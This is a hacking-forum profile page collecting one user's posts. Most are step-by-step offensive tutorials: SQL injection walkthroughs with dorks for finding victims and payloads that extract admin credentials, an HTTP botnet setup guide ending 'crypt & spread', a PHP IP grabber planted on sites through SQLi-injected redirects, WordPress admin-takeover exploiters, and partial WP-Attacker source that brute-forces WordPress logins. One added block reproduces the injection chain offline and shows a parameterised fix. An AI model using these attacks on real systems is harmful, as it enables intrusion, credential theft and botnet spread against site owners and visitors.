Aerosol

Everything posted by Aerosol

  1. Very good initiative, congratulations. See, there are still people who don't think only about money...
  2. Save 90% on PAYDAY™ The Heist on Steam, for those of you who didn't know. $1.49
  3. @Coco I just bought a Windows Phone, don't you have any method?
  4. Credits to: CookiesOwner

     SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

     Step-by-step tutorial for SQL injection

     Step 1: Find a website that is vulnerable to the attack.
     This is the first step in SQLi and, like in every other hack attack, it is the most time-consuming step, and the only time-consuming one. Once you get through this, the rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks (Google strings to find vulnerable sites). At the end of this post, we'll also provide a list of vulnerable sites.
     You can also write your own.

     How to check if a webpage is vulnerable to this attack?
     Once you execute the dorks and get the preferred search results, say for example http://www.abcd.com/index.php?catid=1, add a ' (apostrophe) at the end of the URL, such that the URL looks like http://www.abcd.com/index.php?catid=1'
     If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.
     Typical errors you'll get after appending the apostrophe are:
     Warning: mysql_fetch_array():
     Warning: mysql_fetch_assoc():
     Warning: mysql_numrows():
     Warning: mysql_num_rows():
     Warning: mysql_result():
     Warning: mysql_preg_match():

     Step 2: Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.
     Append an 'order by' statement to the URL, e.g. http://www.abcd.com/index.php?catid=1 order by 1
     Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table.
     Now to know the column numbers which are accepting the queries, append a 'union select' statement to the URL. Also precede the number after "id=" with a hyphen or minus. Say from the above step you got that the table has 6 columns, e.g. http://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6
     The result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.

     Step 3: Enumerating the SQL version
     We'll use the MySQL command @@version or version() to get the version of the DB. We have to inject the command in one of the open columns. Say we use column number 2, e.g. http://www.abcd.com/index.php?catid=-1 union select 1,@@version,3,4,5,6
     You'll get the version of the database in the place where you had got the number 2. If the version number starts with 5 or more, then you are good to go. If less, move on to another site.

     Step 4: Exploit
     To get the list of databases: http://www.abcd.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
     The result will display a list of databases on the site. From here on, we'll write the results we have got from our test.
     Result: information_schema,vrk_mlm
     To know the current database in use: http://www.abcd.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--
     Result: vrk_mlm
     To get the current user: http://www.abcd.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
     Result: vrk_4mlm@localhost
     To get the tables: http://www.abcd.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
     Result: administrator,category,product,users
     We'll concentrate our attack on the users table.
     To get the columns: hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
     Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,email_id,password,edited_on,last_login,created_on,chain_number,phone,address
     By looking at the columns closely, and at the order of the tables, we can conclude that the columns starting from id,incredible_id belong to the users table, and that is the one we are interested in.
     Extract information: union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--
  5. How To Set Up an HTTP Botnet + Getting a Website and Hosting.
     Credits to: Re4orm

     Some things you need to know: A botnet is a panel that can keep many computers connected to it. The computers connected to it are called bots. The bots will be under your command, so you will be able to command them to do things and they will do it. In this tutorial I will teach you how to set up a botnet. Alright, let's start.

     If you already have a website + hosting, don't click on this spoiler; if you don't, click. PS: the website name cannot be longer than 12 characters.
     This is how to create a free website and get free hosting. First go to Dot.Tk and register. After you log in, go to Domain Panel and then add a domain name. Now open a new browser and go to DerpyMail (free hosting). Add the free hosting to your cart and register, then check out! Go back to Dot.TK, go to the Domain Panel and click Modify. Change the name servers (DNS/NS) to ns1.derpymail.us and ns2.derpymail.us. Then wait for the email with your new account information and continue to the next part!

     Before doing anything, download the botnet files. To download the botnet, click here.
     Step 1: Extract the botnet files and then open up the folder "Panel". Find Config.Php and edit it with any writing program.
     Step 2: Now go to your webhost and add an SQL DB and user. When you are done with that, upload the .sql from the folder "SQL" to your SQL DB.
     Step 3: Edit the SQL connection info in Config.Php. Save when done.
     Step 4: Upload everything in the folder "Panel" to your webhost. Now close the folder etc.
     Step 5: Go to the website you used to upload. Log in to your botnet with the password in Config.Php. Congratulations! You got your own botnet!
     Step 6: Go back to the folder "Botnet" and open up Build.exe. Then type in your domain name and the path. Build the file, crypt & spread!
  6. But there are also beginner users, and it helps them.
  7. Credits to: Spanky

     Hello all members. Do you know I'm new here. But I want to share something with you. Today I will show you how to grab someone's IP address using SQL injection.

     Requirements:
     PHP IP grabber
     Hosting or shelled website
     JavaScript knowledge or XSS knowledge
     SQL injection knowledge
     SQLi vulnerable website

     OK. Let's start, brothers.

     PHP IP Grabber:

         <?php
         // IP Grabber
         // Variables
         $protocol = $_SERVER['SERVER_PROTOCOL'];
         $ip       = $_SERVER['REMOTE_ADDR'];
         $port     = $_SERVER['REMOTE_PORT'];
         $agent    = $_SERVER['HTTP_USER_AGENT'];
         $ref      = $_SERVER['HTTP_REFERER'];
         $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
         // Print IP, hostname, port number, user agent and referer to log.txt
         $fh = fopen('log.txt', 'a');
         fwrite($fh, 'IP Address: ' . $ip . "\n");
         fwrite($fh, 'Hostname: ' . $hostname . "\n");
         fwrite($fh, 'Port Number: ' . $port . "\n");
         fwrite($fh, 'User Agent: ' . $agent . "\n");
         fwrite($fh, 'HTTP Referer: ' . $ref . "\n\n");
         fclose($fh);
         ?>

     Create a file called LOG.TXT in the same folder as this .php script! Copy the above code, open notepad.exe and paste it. Save this note as filename.php. Then you must save a blank note as log.txt. Now you have a PHP IP grabber.

     The next step is hosting or a shelled website. Upload your filename.php and log.txt. The URLs will be like this: http://hosting.com/filename.php and http://hosting.com/log.txt
     You must send http://hosting.com/filename.php to the victim. After the victim clicks the URL you sent, you can see the IP address at http://hosting.com/log.txt. But I want to show you a sending method to the victim. It is very simple and effective for me, because I have many SQL injectors. Now you must search for SQLi vulnerable sites and inject them. OK. Now, I assume you have an SQLi vulnerable site.
     http://www.site.com/catid=3 union select 1,2,@@version,4,5--
     The above SQL query will show you the SQL version. If you have SQL knowledge, you will know it easily. I told you, you must know about JavaScript or XSS script.
     Look at the following code.
     <script>window.location.href="http://www.yourhosting.com/yourfilename.php"</script>
     This code stands for a URL redirect; you can use this code instead of @@version in SQLi queries. So our final code will be the following:
     http://www.site.com/catid=3 union select 1,2,0x<script>window.location.href="http://www.yourhosting.com/yourfilename.php"</script>,4,5--
     You need to change the string to hex behind the 0x. You can change text to a hex value at the following site: http://www.swingnote.com/tools/texttohex.php
     Now you can send this URL to any SQL injectors.
  8. Credits to: Joker

     Step 1. The website
     Okay, so this website has been designed very poorly. It has a constant design color of green and some stupid navigation panel. It has multiple places such as "Products" and "Links". Overall this website is pretty shitty.

     Step 2. Finding the vulnerability
     Okay, before we are actually able to do this attack we need to find a vulnerability. To do this we will have to go to pages and click on other pages we find within the main page we clicked on; for this example I'll use "Products". After you are in the "Products" section, just click on a product and then we can get into the fun part. I'll be using "Herbs" for this. After you chose your product group such as "Herbs", click on a product within the category and you will be taken to the page for that product. To notice if we have found a vulnerable page in the "Products" section, look at the website URL; it should have something like products.php?prodid=<number>
     If it does, then to find out if it is vulnerable we need to put a ' or a fucked up piece of math logic such as 1=0--
     If done correctly the URL should look like products.php?prodid=<number>' or 1=0--
     If the site is vulnerable you should get an error like this:
     Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1

     Step 3. Exploiting the vulnerability
     If you got this far you have obviously understood the first 2 steps, now let's move on. Once you have found your vulnerability we can exploit it in order to get some info that we shouldn't be able to get. First let's start with getting the table names on the page by typing the following into the website URL.
     products.php?prodid=<number> order by 20--
     Now for this website it should have come up with an error that says:
     Error performing query: Unknown column '20' in 'order clause'
     If it does, then we know our number is too big, so let's cut the number in half to 15 and put it into the URL.
     products.php?prodid=<number> order by 15--
     Once again we should get the same error, but this time the number should be 15. We are now going to drop down 5 more, to 10; if done correctly it should be:
     products.php?prodid=<number> order by 10--
     We also get the same error, just with the number 10, so why not drop to 5?
     products.php?prodid=<number> order by 5--
     Holy shit, we no longer have an error! But we still need to find the max number we can go to in order to do this attack properly. I suggest you increment the number by 1 until you can no longer view the page and begin to get an error again.

     Step 4. Finding the table names
     If you have managed to follow all the steps properly you are now able to start getting the table and column names. For this section of the tutorial we will be covering how to get the table names first. Okay so, to get the name of what is known in the SQL syntax as a "table" we need to add some more lines of code into the URL bar. The code we will be adding requires that what we currently have is deleted. In place of what we currently have, we need to insert the following code.
     products.php?prodid=-<number> union select 1,2,3,4,5,6,7--
     If done correctly you should see a number on your screen; this shows what number is vulnerable and we can start attacking. If this was not done correctly and you still see words on the screen, place a minus sign (-) in front of the product id. Now to get the table names we need to format the URL string as follows.
     products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables--
     If done correctly you should see text such as:
     CHARACTER_SETS
     You may now scroll through the tables and see what you would like. I want to get admin login info, so I will use the "admin" table I have found.

     Step 5. Getting column names
     Okay, to get the names of what is known in the SQL syntax as a "column", all we need to do is go back to what we had in "Step 4" and just change it to this.
     products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--
     Once this is done you may look through what you want and, as I said, I wanted admin login. I will proceed to use the columns "login" and "password".

     Step 6. Getting our login info
     Okay, now to get the login info that we wanted we need to make sure that we wrote down what the info was; if we didn't, we need to look again. Since I wrote the info I needed down, I now know that what I need to use is below.
     login, password, admin
     Now you may be wondering how we use what we have obtained; well, it's simple. Just follow my instructions and you will have admin info. To get the info we need to take the string we currently have, which should be:
     products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns
     We need to replace "column_name" and "information_schema.columns" with "concat(login,0x3a,password)" and "admin". Once this is done it should look like this:
     products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin--
  9. Credits to: Tumppi

     Finding a vulnerable site
     So you want to hack a site. Well, first you need to find one to attack. For this you will need what is called a 'Google Dork'. Below is a small example of one of these.
     You will need to search these in Google to find your victim's site...

     Testing for a vulnerability
     Okay, so you have your site and you want to see if it's vulnerable. What do? Well, that's simple! All you have to do is take your URL and add an apostrophe. For example: https://site.com/store.php?id=4 turns into https://site.com/store.php?id=4'
     If you get an error from that, you have a vulnerable site.

     Finding the number of columns
     Right, now we get moving. You now need to find the number of columns...
Here's how we do this: https://site.com/store.php?id=4 order by 2-- (No Error) https://site.com/store.php?id=4 order by 3-- (No Error) https://site.com/store.php?id=4 order by 4-- (NO Error) https://site.com/store.php?id=4 order by 5-- (Error) Now we get an error on 5. This Means there are 4 columns. Finding the Vulnerable Column So now we know how many columns there are we need to find the Vulnerable column. Here's how we do this: https://site.com/store.php?id=-4 UNION SELECT 1,2,3,4-- (We have to remember to add the hyphen after the id= or the site will return a normal page) A Number (or a few)should show up in the browser. Take the biggest one and that's the vulnerable column. for example purposed lets say i got 2. Finding the Database Version Now We need to know the database version. Here's how we do it: https://site.com/store.php?id=-4 UNION SELECT 1,@@version,3,4-- The database version should now be displayed in the browser. Finding the database name Now we have the version we need the DBname. To get this we enter: https://site.com/store.php?id=-4 UNION SELECT 1,concat(database()),3,4-- Now we should have the DBname in browser. Finding the tables Now we need to find the tables. This is how you can do it: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- Now we should have the names of the tables. Viewing the tables Informtion Now we want the information so we enter this into the URL: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="userinfo" This will Probably return an error. If it does, never fear! find a string to hex converter and convert to hex. Use something like String Functions Online For example mine would become this: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x75736572696e666f0d0a You MUST! 
add the 0x or the server wont know it's a command. Displaying The tables Contents Now you want to see the contents. so enter this: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(user,0x3a,password),3,4 FROM DBname.userinfo-- Now all you need to do is find the admin login page and you're in! Upload a Shell, r00t the server, deface the site... whatever you want. This should get you going in the world of SQLi
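The UNION-based walk-through above (column count via ORDER BY, marker columns via UNION SELECT, then version, table list, column list and credentials), reproduced as an added example that is not part of the original post. It runs offline against a SQLite database constructed here: the `store.php?id=` endpoint, the `products` and `userinfo` tables and their rows are all made up for illustration, and the MySQL-only pieces (`@@version`, `information_schema`, `concat(a,0x3a,b)`) are swapped for their SQLite equivalents (`sqlite_version()`, `sqlite_master` / `pragma_table_info`, `a||':'||b`). Distinct string markers are used instead of the bare integers 1,2,3,4 so the check for which column is rendered is unambiguous. The last function shows the same endpoint with a bound parameter, which is what stops the whole chain.

```python
import re
import sqlite3


def build_db():
    """Constructed sample data standing in for the target's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT, descr TEXT);
        INSERT INTO products VALUES (4, 'Widget', '9.99', 'A useful widget');
        CREATE TABLE userinfo(user TEXT, password TEXT);
        INSERT INTO userinfo VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO userinfo VALUES ('bob',   'e10adc3949ba59abbe56e057f20f883e');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """Stand-in for store.php?id=...: the parameter is concatenated straight
    into the SQL, and only the name and descr columns are rendered."""
    sql = "SELECT id, name, price, descr FROM products WHERE id=" + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "<p>Database error: %s</p>" % exc
    return "".join("<h1>%s</h1><p>%s</p>" % (r[1], r[3]) for r in rows)


def count_columns(conn, limit=32):
    """'order by N' probing: the first N that errors is one past the count."""
    for n in range(1, limit + 1):
        if "Database error" in vulnerable_page(conn, "4 ORDER BY %d-- " % n):
            return n - 1
    return None


def reflected_columns(conn, ncols):
    """'UNION SELECT 1,2,...' step with string markers: report which of the
    markers the page actually renders (those are the usable columns)."""
    markers = ",".join("'X%d'" % i for i in range(1, ncols + 1))
    page = vulnerable_page(conn, "-4 UNION SELECT %s-- " % markers)
    return [i for i in range(1, ncols + 1) if "X%d" % i in page]


def extract(conn, col, ncols, expr, from_clause=""):
    """Place `expr` in the reflected column, NULL elsewhere, and read the
    value back out of the rendered <h1>."""
    cells = ["NULL"] * ncols
    cells[col - 1] = expr
    payload = "-4 UNION SELECT %s%s-- " % (",".join(cells), from_clause)
    m = re.search(r"<h1>(.*?)</h1>", vulnerable_page(conn, payload))
    return m.group(1) if m else None


def safe_page(conn, id_param):
    """Hardened store.php: a bound parameter is data, never SQL text, so
    'ORDER BY' and 'UNION' probes simply match no row."""
    return conn.execute(
        "SELECT id, name, price, descr FROM products WHERE id=?", (id_param,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    n = count_columns(db)
    col = reflected_columns(db, n)[0]
    print("columns:", n, "reflected:", reflected_columns(db, n))
    print("version:", extract(db, col, n, "sqlite_version()"))
    print("tables: ", extract(db, col, n,
          "(SELECT group_concat(name) FROM sqlite_master WHERE type='table')"))
    print("columns:", extract(db, col, n,
          "(SELECT group_concat(name) FROM pragma_table_info('userinfo'))"))
    print("creds:  ", extract(db, col, n,
          "group_concat(user||':'||password)", " FROM userinfo"))
    print("hardened endpoint on the same probe:", safe_page(db, "4 ORDER BY 5-- "))
```

Note the trailing space after `--` in every payload: MySQL only treats `--` as a comment when whitespace follows it, which is why the URL form is written `--+`.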
  10. Thanks, I had been looking for the first theme for a while; a friend wanted it for his blog.
  11. Adobe today revised a security bulletin it released more than a month ago, adding a patch for a code-execution vulnerability in Flash Player already included in some exploit kits. French researcher Kafeine found the exploits in the Angler and Nuclear kits less than a week after Adobe released an update Oct. 14. The update addressed three CVEs, all of which could lead to memory corruption or integer overflows, enabling attackers to remotely load and execute code on the compromised computer. Today’s patch adds CVE-2014-8439, reported by Kafeine to Adobe. Fiesta and Angler are used to compromise vulnerable websites and redirect site visitors to sites hosting banking malware, malvertising schemes and other attacks. Flash Player bugs are among the most common vulnerabilities exploited by such kits, as well as Java and Microsoft Silverlight vulnerabilities. The inclusion of the Oct. 14 CVEs in the exploit kits was worrisome to Kafeine, who does extensive research into these attack tools, noting that an attacker likely found a way to reverse-engineer the Adobe patch in order to drop it in the EK inside of a week. Kafeine said that the Adobe patches released on Oct. 14 likely protected users from the active exploits, but the vulnerability remained exposed to future exploit development. Today’s update moves Flash Player to version 15.0.0.239 for Windows and Macintosh users, and 11.2.202.424 for Linux users. Chrome and Internet Explorer users will be updated automatically by Google and Microsoft respectively. Another Adobe exploit in Angler was reported last week, also by Kafeine. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. Source
  12. Aerosol

    "10 posts"

    I agree with @albertynos that you shouldn't be able to post in that category if you don't have the required number of posts. Many people post there at random using the excuse "I know I don't have enough posts, but I figured I'd post anyway".
  13. Credits to: Foksi

WordPress Auto-Exploiter is a tool that allows you to register as a new administrator on WordPress sites that have a flaw in the file ajax.php (the authorization file that stores user data).

Instructions for using the online WordPress auto-exploiter:
- In the URL field, paste the link of the site; in the theme field, write the name of the theme; in the mail field, write your e-mail.
- Press Confirm, then Exploit.
- If the site is vulnerable, the "Register" button will be enabled.
- Click Register and the web browser will take you to the registration page.
- Enter the user name and e-mail address.
- Check your inbox for the confirmation and the password of your account.

If the WordPress site you selected is vulnerable and you have done all the above steps correctly, then you have successfully registered on this site with administrator rights.

VirusTotal | Download | Tutorial
  14. Credits to: Foksi

WordPress Auto-Exploiter is a tool that enables you to register as a new admin on a WordPress site which has the bug in the ajax.php file.

How to create dorks? It's very easy to create the dorks; the list of vulnerable themes is already provided in the right-hand text box, so you just need to add the theme name.
Dork: inurl:/wp-content/themes/[theme_name]
Example: inurl:/wp-content/themes/appius

How to use the tool? It's easy: once you have found your target,
- Simply paste the site URL, theme name and your email into the text boxes.
- Click on Confirm > Exploit.
- If your target is vulnerable, the "Register" button will be enabled.
- Click on Register and the web browser will bring you to the registration page.
- Enter your username and email.
- Check your email inbox for the confirmation and the password for your account.
- Log in to the site and there you go. You can also upload a shell to the site.
  15. An automation tool to scan for an SQL injection vulnerability. SQLI Hunter is an automation tool to scan for an SQL injection vulnerability in a website. It automates the search for SQLi-vulnerable links on Google using Google dorks! SQLI Hunter can also find the admin page of any website by using some predefined admin page lists. Fast and easy to use! Download
  16. WP-ATTACKER v.4
Credits to: Hannibal Ksa

What's new?
- Grab all WordPress websites on the server via the Bing API
- Scan all the possible plugins/themes on each website from a list (provided by the user)
- Brute force using the correct username and a password list via xmlrpc.php *NEW*
- Brute force using the correct username and a password list via wp-login.php *MODIFIED*
- Scan all the possible plugins/themes on each website from security databases *MODIFIED*
- Change the appearance of the tool

Plugins/themes list format:
XP:wp-content/plugins/XP/lib/exploit.php:Group-XP
XP = plugin/theme's name
wp-content/plugins/XP/lib/exploit.php = plugin/theme's path
Group-XP = keyword (clue to double-check that it's there!)
NOTE: the keyword value is optional; in this version the tool uses two methods to check plugins and/or themes: the keyword, or the response headers.

Password list:
123456
password
admin
whateva

Brute force using two methods: the usual way (wp-login.php) and the new way (xmlrpc.php). Checking plugins and/or themes using two methods: keyword (provided by the user) or headers. Any list could be used with a simple modification, as an example: HERE!
Pictures of brute forcing (success!): XMLRPC, WP-LOGIN
Before downloading you must have a Bing API hash: here
Download link: HERE

```php
<?php
/*
   [ Unicode block-letter banner for ALM3REFH.COM: the box-drawing
     characters did not survive extraction and are omitted here ]

   FORTH VERSION
   WP Attacker v4 © Group XP 2014
   Coder : Hannibal Ksa (@r00t3rz)
   Home  : alm3refh.com, sec4ever.com

   What's WP Attacker:
   - Scan the server's websites, and filter the ones that are using WordPress (Using Bing search engine [API]).
   - Get all the possible plugins and themes, which are vulnerable (Using a list). *UPDATED*
   - BruteForce each website that uses WordPress (Using a correct username and a passwords list).
   - BruteForce each website that uses WordPress (via XMLRPC's file using a correct username). *NEW*
   - Get all the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
   - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*

   Why WP Attacker?
   - Using Bing API, which leads to faster & guaranteed response.
   - User can use his own 0day exploits.
   - BruteForce with two methods/ways.
   - List can be updated by the user.
   - Fast, simple and easy.
   # In a simple word, it is an "Automatic WP Exploiter".

   Disclaimer:
   - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST.
   - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY BE LIABLE FOR ANY LOSS OR DAMAGE ARISING FROM THE USE OF THIS TOOL.
   - USE IT AT YOUR OWN RISK!
   - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.

   Thanks and enjoy. And stay tuned!
   Best regards,
   Ali (aka Hannibal Ksa).
*/
error_reporting(0);

function clear(){
    ##########################
    ##  CLEAN THE SCREEN    ##
    ####################################################
    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
    ####################################################
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        @system('cls');    # Windows
    } else {
        @system('clear');  # Linux/UNIX/OS X
    }
}

function banner(){
    ##########################################################
    ##  BANNERS/COPYRIGHTS R00T3RZ.COM & ALM3REFH.COM       ##
    ##  REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"    ##
    ##########################################################
    ##  (THE ALIGNMENT OF THE ASCII ART BELOW WAS LOST      ##
    ##   WHEN THE SOURCE WAS PASTED)                        ##
    ##########################################################
    ####################
    ##  FIRST BANNER  ##
    ####################
    $bannerone  = "\n\t _ _____ ___ _______________ _______ _________";
    $bannerone .= "\n\t | | /| / / _ \ / _ /_ __/_ __/ _ |/ ___/ //_/ __/ _ \\";
    $bannerone .= "\n\t | |/ |/ / ___/ / __ |/ / / / / __ / /__/ ,< / _// , _/";
    $bannerone .= "\n\t |__/|__/_/ /_/ |_/_/ /_/ /_/ |_\___/_/|_/___/_/|_| \n";
    $bannerone .= "\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    #####################
    ##  SECOND BANNER  ##
    #####################
    $bannertwo  = "\n\t ( ";
    $bannertwo .= "\n\t ( ( )\ ) ( ) ) ) ";
    $bannertwo .= "\n\t )\))( '(()/( )\ ( /(( /( ) ( /( ( ( ";
    $bannertwo .= "\n\t((_)()\ ) /(_)) ((((_)( )\())\()| /( ( )\()) ))\ )( ";
    $bannertwo .= "\n\t_(())\_)()(_)) )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\ ";
    $bannertwo .= "\n\t\ \((_)/ /| _ \ (_)_\(_) |_| |_((_)_ ((_) |(_|_)) ((_) ";
    $bannertwo .= "\n\t \ \/\/ / | _/ / _ \ | _| _/ _` / _|| / // -_)| '_| ";
    $bannertwo .= "\n\t \_/\_/ |_| /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_| \n";
    $bannertwo .= "\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    ####################
    ##  THIRD BANNER  ##
    ####################
    $bannerthr  = "\n\t _ _ _ _____ _____ _ _ _ ";
    $bannerthr .= "\n\t| | | | _ | | _ | |_| |_ ___ ___| |_ ___ ___ ";
    $bannerthr .= "\n\t| | | | __| | | _| _| .'| _| '_| -_| _|";
    $bannerthr .= "\n\t|_____|__| |__|__|_| |_| |__,|___|_,_|___|_| \n";
    $bannerthr .= "\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    #####################
    ##  FOURTH BANNER  ##
    #####################
    $bannerfor  = "\n\t _ _______ ___ _ _ _ ";
    $bannerfor .= "\n\t| | | | ___ \ / _ \| | | | | | ";
    $bannerfor .= "\n\t| | | | |_/ / / /_\ \ |_| |_ __ _ ___| | _____ _ __ ";
    $bannerfor .= "\n\t| |/\| | __/ | _ | __| __/ _` |/ __| |/ / _ \ '__|";
    $bannerfor .= "\n\t\ /\ / | | | | | |_| || (_| | (__| < __/ | ";
    $bannerfor .= "\n\t \/ \/\_| \_| |_/\__|\__\__,_\___|_|\_\___|_| \n";
    $bannerfor .= "\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    ####################
    ##  FIFTH BANNER  ##
    ####################
    ## THE ORIGINAL USED UNICODE BLOCK CHARACTERS, WHICH DID NOT SURVIVE
    ## EXTRACTION; A PLAIN-TEXT STAND-IN IS USED HERE.
    $bannerfiv  = "\n\t[ WP ATTACKER ]\n";
    $bannerfiv .= "\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    #########################################
    ##  GET A RANDOM BANNER & PRINT IT     ##
    ##  METASPLOIT SWAG                    ##
    #########################################
    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
    print $banner[array_rand($banner)];
}

function noblackhat(){
    ##################
    ##  DISCLAIMER  ##
    ##################
    print "\n\t ______________________________________________";
    print "\n\t| ____ __ ______ |";
    print "\n\t| / ___|_ __ ___ _ _ _ __ \ \/ / _ \ |";
    print "\n\t| | | _| '__/ _ \| | | | '_ \ \ /| |_) | |";
    print "\n\t| | |_| | | | (_) | |_| | |_) | / \| __/ |";
    print "\n\t| \____|_| \___/ \__,_| .__/ /_/\_\_| |";
    print "\n\t| |_|ALM3REFH.com |";
    print "\n\t| |";
    print "\n\t+----------------------------------------------+";
    print "\n\t| WP Attacker v4 - By Hannibal Ksa |";
    print "\n\t+----------------------------------------------+\n\n";
    print "\n\t\t !! NO SHIA / ONLY SUNNAH !!\n\n";
    ###########################
    ##  5 SECONDS DISCLAIMER ##
    ###########################
    print "\n\n\tThis tool may be used for legal purposes only. Users take full \tresponsibility for any actions performed using this tool. \tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY! \tIf these terms are not acceptable to you, then do not use this tool. \n\tPlease Read! Continuing in 5 seconds ";
    sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
    print "\n\n\n\n";
}

function bing_it($hk){
    ##################
    ##  BING API    ##
    ###########################################################################
    ##  REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]    ##
    ##  MORE INFO [ https://datamarket.azure.com/dataset/bing/search ]       ##
    ###########################################################################
    $account_key = 'ACCOUNT_KEY_GOES_HERE';
    $query = $hk;
    $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    # NOTE: the two options below disable TLS certificate validation for the API call
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
    $json = curl_exec($ch);
    curl_close($ch);
    $data = json_decode($json);
    if(!isset($data->d->results)){ return; }
    foreach ($data->d->results as $value) {
        $file = fopen("sites.txt", "a+");
        fwrite($file, "{$value->DisplayUrl}\n");
        fclose($file);
    }
}

function wp($list){
    ########################################
    ##  CHECK IF IT IS BUILT ON WORDPRESS ##
    ########################################
    $file = file_get_contents($list);
    $get = explode("\n", $file);   # was explode('\n'): single quotes split on a literal backslash-n, not a newline
    foreach($get as $site){
        $site = trim($site);
        if($site === ""){ continue; }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $site);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
        $result = curl_exec($ch);
        curl_close($ch);
        if(preg_match("#wp-content#", $result) or preg_match("#wp-includes#", $result)){
            $fp = fopen('wp-sites.txt', "a+");
            fputs($fp, $site."\n");
            fclose($fp);
        }
    }
    $lines = file('wp-sites.txt');
    $lines = array_unique($lines);
    file_put_contents('wp-sites.txt', implode($lines));
}

function wp_em($list){
    ###############################
    ##  MAKE'EM CRYSTAL CLEAR    ##
    ###############################
    ## RESOLVE THE REAL WORDPRESS BASE URL FROM THE PINGBACK LINK
    $file = file_get_contents($list);
    $get = explode("\n", $file);
    foreach($get as $wpsite){
        $wpsite = trim($wpsite);
        if($wpsite === ""){ continue; }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $wpsite);
        curl_setopt($ch, CURLOPT_HEADER, 0);
